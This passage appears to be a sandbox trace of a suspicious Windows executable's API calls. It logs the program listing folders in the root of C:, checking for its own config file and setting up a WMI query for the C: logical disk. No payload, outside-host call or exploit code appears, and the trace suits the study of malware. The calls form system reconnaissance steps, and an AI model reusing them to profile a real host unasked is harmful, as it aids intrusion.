ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0128.393] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x641f0f8 | out: lpFindFileData=0x641f0f8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0128.393] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x641f0f8 | out: lpFindFileData=0x641f0f8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0128.393] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x641f0f8 | out: lpFindFileData=0x641f0f8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0128.393] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x641f0f8 | out: lpFindFileData=0x641f0f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0128.394] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x641f0f8 | out: lpFindFileData=0x641f0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0128.394] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x641f0f8 | out: lpFindFileData=0x641f0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0128.394] FindClose (in: hFindFile=0x77ab30 | out: hFindFile=0x77ab30) returned 1 [0128.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641f380) returned 1 [0128.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641f38c) returned 1 [0128.605] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", nBufferLength=0x105, lpBuffer=0x641d534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", lpFilePart=0x0) returned 0x41 [0128.605] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x641d9c8) returned 1 [0128.605] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x641da44 | out: lpFileInformation=0x641da44*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0128.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641d9c4) returned 1 [0130.964] GetCurrentThreadId () returned 0xb18 [0130.965] ResetEvent (hEvent=0xb8) returned 1 [0130.965] GetCurrentThreadId () returned 0xb18 [0130.965] GetCurrentThreadId () returned 0xb18 [0130.965] GetCurrentThreadId () returned 0xb18 [0130.965] ResetEvent (hEvent=0xb8) returned 1 [0130.965] GetCurrentThreadId () returned 0xb18 [0130.965] GetCurrentThreadId () returned 0xb18 [0130.965] SetEvent (hEvent=0xbc) returned 1 [0130.965] SetEvent (hEvent=0xb8) returned 1 [0130.965] CloseHandle (hObject=0x4bc) returned 1 [0134.054] SysReAllocStringLen (in: pbstr=0x641d70c*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x641d70c*="kernel32") returned 1 [0134.054] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0134.055] GetModuleHandleW (lpModuleName="kernel32") returned 0x76d30000 [0134.058] GetProcAddress (hModule=0x76d30000, lpProcName="ResolveLocaleName") returned 0x76dc4831 [0134.240] CoTaskMemAlloc (cb=0x20c) returned 0x776840 [0134.240] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x776840 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0134.240] CoTaskMemFree (pv=0x776840) [0134.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x641d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0134.241] CoGetObjectContext (in: riid=0x33a8fd0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641dbb8 | out: ppv=0x641dbb8*=0x72015c) returned 0x0 [0134.241] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x641dbb0 | out: pAptType=0x641dbb0*=1) returned 0x0 [0134.241] IUnknown:QueryInterface (in: This=0x72015c, riid=0x33a8fb8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x641dbb4 | out: ppvObject=0x641dbb4*=0x0) returned 0x80004002 [0134.241] IUnknown:Release (This=0x72015c) returned 0x1 [0134.243] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641d520 | out: ppv=0x641d520*=0x6736ee8) returned 0x0 [0134.244] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736ee8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x641d738 | out: ppvObject=0x641d738*=0x0) returned 0x80004002 [0134.244] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736ee8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641d74c | out: ppvObject=0x641d74c*=0x67385b0) returned 0x0 [0134.244] WbemDefPath:IUnknown:Release (This=0x6736ee8) returned 0x0 [0134.244] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641d36c | out: ppvObject=0x641d36c*=0x67385b0) returned 0x0 [0134.244] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x641d328 | out: ppvObject=0x641d328*=0x0) returned 0x80004002 [0134.244] WbemDefPath:IUnknown:AddRef (This=0x67385b0) returned 0x3 [0134.244] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x641cc84 | out: ppvObject=0x641cc84*=0x0) returned 0x80004002 [0134.244] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x641cc34 | out: ppvObject=0x641cc34*=0x0) returned 0x80004002 [0134.244] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641cc40 | out: ppvObject=0x641cc40*=0x77dae8) returned 0x0 [0134.244] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77dae8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x641cc48 | out: pCid=0x641cc48*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0134.245] WbemDefPath:IUnknown:Release (This=0x77dae8) returned 0x3 [0134.245] CoGetContextToken (in: pToken=0x641cca0 | out: pToken=0x641cca0) returned 0x0 [0134.245] CoGetContextToken (in: pToken=0x641d0a8 | out: pToken=0x641d0a8) returned 0x0 [0134.245] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641d138 | out: ppvObject=0x641d138*=0x0) returned 0x80004002 [0134.245] WbemDefPath:IUnknown:Release (This=0x67385b0) returned 0x2 [0134.245] WbemDefPath:IUnknown:Release (This=0x67385b0) returned 0x1 [0134.245] CoGetContextToken (in: pToken=0x641da30 | out: pToken=0x641da30) returned 0x0 [0134.245] CoGetContextToken (in: pToken=0x641d990 | out: pToken=0x641d990) returned 0x0 [0134.245] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x641da60*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x641da5c | out: ppvObject=0x641da5c*=0x67385b0) returned 0x0 [0134.246] WbemDefPath:IUnknown:AddRef (This=0x67385b0) returned 0x3 [0134.246] WbemDefPath:IUnknown:Release (This=0x67385b0) returned 0x2 [0134.246] WbemDefPath:IWbemPath:SetText (This=0x67385b0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0134.246] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67385b0, puCount=0x641dbe4 | out: puCount=0x641dbe4*=0x0) returned 0x0 [0134.246] WbemDefPath:IWbemPath:GetText (in: This=0x67385b0, lFlags=2, puBuffLength=0x641dbe0*=0x0, pszText=0x0 | out: puBuffLength=0x641dbe0*=0x20, pszText=0x0) returned 0x0 [0134.246] WbemDefPath:IWbemPath:GetText (in: This=0x67385b0, lFlags=2, puBuffLength=0x641dbe0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x641dbe0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0134.246] WbemDefPath:IWbemPath:GetInfo (in: This=0x67385b0, uRequestedInfo=0x0, puResponse=0x641dbec | out: puResponse=0x641dbec*=0xc19) returned 0x0 [0134.246] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67385b0, puCount=0x641dbe4 | out: puCount=0x641dbe4*=0x0) returned 0x0 [0134.246] WbemDefPath:IWbemPath:GetInfo (in: This=0x67385b0, uRequestedInfo=0x0, puResponse=0x641dbec | out: puResponse=0x641dbec*=0xc19) returned 0x0 [0134.246] WbemDefPath:IWbemPath:GetInfo (in: This=0x67385b0, uRequestedInfo=0x0, puResponse=0x641dbec | out: puResponse=0x641dbec*=0xc19) returned 0x0 [0134.246] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67385b0, puCount=0x641db64 | out: puCount=0x641db64*=0x0) returned 0x0 [0134.246] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x641db50 | out: puCount=0x641db50*=0x2) returned 0x0 [0134.246] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x641db4c*=0x0, pszText=0x0 | out: puBuffLength=0x641db4c*=0xf, pszText=0x0) returned 0x0 [0134.246] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x641db4c*=0xf, pszText="00000000000000" | out: puBuffLength=0x641db4c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0134.246] CoGetObjectContext (in: riid=0x33a8fd0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641db00 | out: ppv=0x641db00*=0x72015c) returned 0x0 [0134.247] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x641daf8 | out: pAptType=0x641daf8*=1) returned 0x0 [0134.247] IUnknown:QueryInterface (in: This=0x72015c, riid=0x33a8fb8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x641dafc | out: ppvObject=0x641dafc*=0x0) returned 0x80004002 [0134.247] IUnknown:Release (This=0x72015c) returned 0x1 [0134.247] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641d468 | out: ppv=0x641d468*=0x6736f08) returned 0x0 [0134.247] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736f08, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x641d680 | out: ppvObject=0x641d680*=0x0) returned 0x80004002 [0134.247] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736f08, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641d694 | out: ppvObject=0x641d694*=0x6738620) returned 0x0 [0134.248] WbemDefPath:IUnknown:Release (This=0x6736f08) returned 0x0 [0134.248] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641d2b4 | out: ppvObject=0x641d2b4*=0x6738620) returned 0x0 [0134.248] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x641d270 | out: ppvObject=0x641d270*=0x0) returned 0x80004002 [0134.248] WbemDefPath:IUnknown:AddRef (This=0x6738620) returned 0x3 [0134.248] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x641cbcc | out: ppvObject=0x641cbcc*=0x0) returned 0x80004002 [0134.248] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x641cb7c | out: ppvObject=0x641cb7c*=0x0) returned 0x80004002 [0134.248] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641cb88 | out: ppvObject=0x641cb88*=0x77da38) returned 0x0 [0134.248] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77da38, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x641cb90 | out: pCid=0x641cb90*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0134.248] WbemDefPath:IUnknown:Release (This=0x77da38) returned 0x3 [0134.248] CoGetContextToken (in: pToken=0x641cbe8 | out: pToken=0x641cbe8) returned 0x0 [0134.249] CoGetContextToken (in: pToken=0x641cff0 | out: pToken=0x641cff0) returned 0x0 [0134.249] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641d080 | out: ppvObject=0x641d080*=0x0) returned 0x80004002 [0134.249] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x2 [0134.249] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x1 [0134.249] CoGetContextToken (in: pToken=0x641d978 | out: pToken=0x641d978) returned 0x0 [0134.249] CoGetContextToken (in: pToken=0x641d8d8 | out: pToken=0x641d8d8) returned 0x0 [0134.249] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x641d9a8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x641d9a4 | out: ppvObject=0x641d9a4*=0x6738620) returned 0x0 [0134.249] WbemDefPath:IUnknown:AddRef (This=0x6738620) returned 0x3 [0134.249] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x2 [0134.249] WbemDefPath:IWbemPath:SetText (This=0x6738620, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0134.249] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738620, puCount=0x641db28 | out: puCount=0x641db28*=0x2) returned 0x0 [0134.249] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=4, puBuffLength=0x641db24*=0x0, pszText=0x0 | out: puBuffLength=0x641db24*=0xf, pszText=0x0) returned 0x0 [0134.249] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=4, puBuffLength=0x641db24*=0xf, pszText="00000000000000" | out: puBuffLength=0x641db24*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0134.249] CoGetObjectContext (in: riid=0x33a8fd0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641db28 | out: ppv=0x641db28*=0x72015c) returned 0x0 [0134.249] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x641db20 | out: pAptType=0x641db20*=1) returned 0x0 [0134.249] IUnknown:QueryInterface (in: This=0x72015c, riid=0x33a8fb8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x641db24 | out: ppvObject=0x641db24*=0x0) returned 0x80004002 [0134.249] IUnknown:Release (This=0x72015c) returned 0x1 [0134.250] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641d748 | out: ppv=0x641d748*=0x672f358) returned 0x0 [0134.251] WbemLocator:IUnknown:QueryInterface (in: This=0x672f358, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x641d960 | out: ppvObject=0x641d960*=0x0) returned 0x80004002 [0134.251] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f358, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641d974 | out: ppvObject=0x641d974*=0x6736f18) returned 0x0 [0134.251] WbemLocator:IUnknown:Release (This=0x672f358) returned 0x0 [0134.251] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f18, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641d594 | out: ppvObject=0x641d594*=0x6736f18) returned 0x0 [0134.251] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f18, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x641d550 | out: ppvObject=0x641d550*=0x0) returned 0x80004002 [0134.251] WbemLocator:IUnknown:AddRef (This=0x6736f18) returned 0x3 [0134.251] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f18, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x641ceac | out: ppvObject=0x641ceac*=0x0) returned 0x80004002 [0134.251] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f18, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x641ce5c | out: ppvObject=0x641ce5c*=0x0) returned 0x80004002 [0134.251] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f18, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641ce68 | out: ppvObject=0x641ce68*=0x0) returned 0x80004002 [0134.251] CoGetContextToken (in: pToken=0x641cec8 | out: pToken=0x641cec8) returned 0x0 [0134.251] CoGetContextToken (in: pToken=0x641d2d0 | out: pToken=0x641d2d0) returned 0x0 [0134.252] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f18, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641d360 | out: ppvObject=0x641d360*=0x0) returned 0x80004002 [0134.252] WbemLocator:IUnknown:Release (This=0x6736f18) returned 0x2 [0134.252] WbemLocator:IUnknown:Release (This=0x6736f18) returned 0x1 [0134.252] CoGetContextToken (in: pToken=0x641d940 | out: pToken=0x641d940) returned 0x0 [0134.252] CoGetContextToken (in: pToken=0x641d8a0 | out: pToken=0x641d8a0) returned 0x0 [0134.252] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f18, riid=0x641d970*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x641d96c | out: ppvObject=0x641d96c*=0x6736f18) returned 0x0 [0134.252] WbemLocator:IUnknown:AddRef (This=0x6736f18) returned 0x3 [0134.252] WbemLocator:IUnknown:Release (This=0x6736f18) returned 0x2 [0134.253] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738620, puCount=0x641db04 | out: puCount=0x641db04*=0x2) returned 0x0 [0134.253] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=8, puBuffLength=0x641db00*=0x0, pszText=0x0 | out: puBuffLength=0x641db00*=0xf, pszText=0x0) returned 0x0 [0134.253] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=8, puBuffLength=0x641db00*=0xf, pszText="00000000000000" | out: puBuffLength=0x641db00*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0134.253] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, 